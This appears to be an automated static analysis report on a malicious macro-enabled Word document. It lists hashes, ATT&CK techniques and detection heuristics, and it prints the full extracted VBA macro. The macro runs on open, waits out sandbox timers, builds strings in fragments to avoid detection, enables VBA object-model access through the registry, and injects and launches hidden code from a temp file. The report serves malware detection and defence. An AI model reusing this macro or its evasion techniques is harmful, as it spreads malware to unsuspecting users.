Malicious Office (OOXML) / .DOC — malware analysis report

Static analysis result for SHA-256 06e4084e2d043f21…

MALICIOUS

Office (OOXML) / .DOC

Size: 65.7 KB
Created: 2024-08-27 14:45:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2026-05-13
MD5: 3d33ac05d0ca473518c784c37bc887a9
SHA-1: 8071b87ab3307a907052abce7092c4f5605e4ae3
SHA-256: 06e4084e2d043f216c0bc7931781ce3e1cea4eca1b6092c0e34b01a89e2a6dea
Risk Score: 178

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder
  • T1204.002 Malicious File

The sample contains VBA macros that execute upon opening the document, as indicated by the 'documeNt_opEn' subroutine. The macro constructs a string 'WScript.Shell' to create a Windows Script Host object, which is then used to write a value to the registry key HKCU\Software\Microsoft\Office\16.0\Word\Security\AccessVBOM. This action likely aims to enable programmatic access to the VBA object model, potentially to facilitate further malicious actions or persistence. The macro also attempts to save the document and then opens a new document, suggesting a downloader or dropper functionality.

Heuristics (7)

  • VBA project inside OOXML (medium, 4 related findings) OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA macro-virus self-replication / AV tampering (critical) OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "Sub goods() : : End Sub" & vbCrLf & "Sub baads() : : End Sub" & vbCrLf & danger()
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
            Set wsl = CreateObject(strng)
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro (low) OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub documeNt_opEn()
  • External hyperlinks (2) (low) OOXML_EXTERNAL_HYPERLINKS
    Document contains 2 external hyperlinks — clickable URLs are stored as external relationships. First target: mailto:m.madelkhanov@mfa.kz
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 1974 bytes
SHA-256: cab6f078d1ea32030ccaca88a921f8f4c4080728d12ffb69057d8383fa7fa431
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public objApp, wsl
Function danger()
        danger = ActiveDocument.Variables.Item("s2")
End Function
Function rundoc(namedoc)
        Set doc2 = objApp.Documents.Open(namedoc)
    doc2.Save
    doc2.Close
End Function
Sub verydanger()
        strng = "WSc" & "ript.She"
        strng = strng & "ll"
        Set wsl = CreateObject(strng)
        wsl.RegWrite "HK" & "CU\Softw" & "are\Micr" & "osoft\Of" & "fice\" & Application.Version & "\Wo" & "rd\Sec" & "urity\Acce" & "ssVBO" & "M", 1, "REG_D" & "WORD"
End Sub
Sub documeNt_opEn()
    On Error Resume Next
        ActiveDocument.Unprotect ("oikmseM#*inmowefj8349an3")
        For i = ActiveDocument.Shapes.Count To ActiveDocument.Shapes.Count + 1 - ActiveDocument.ActiveWindow.Panes(1).Pages.Count * 2 Step -1
                ActiveDocument.Shapes(i).Delete
        Next i
    ActiveDocument.Save
        sss = Now()
    While Now < sss + TimeValue("00:00:20")
        DoEvents
    Wend
        If Now() - sss < TimeValue("00:00:15") Then Exit Sub
        verydanger
    Set objApp = CreateObject("Word.Application")
    objApp.Visible = False
    Set doc = objApp.Documents.Add
    For Each vars In ActiveDocument.Variables
    doc.Variables.Add vars.Name & "ergegdr", vars
    i = i + 1
    Next
    doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "Sub goods() : : End Sub" & vbCrLf & "Sub baads() : : End Sub" & vbCrLf & danger()
    tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp")
    doc.SaveAs2 tmp & "\" & ActiveDocument.Name & ".doc", 13
    doc.Close
        rundoc (tmp & "\" & ActiveDocument.Name & ".doc")
        objApp.Quit False
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 22016 bytes
SHA-256: e917622d343402cf0f558450f25e45658228bdeef0ff4e56f2dea08140afbc1b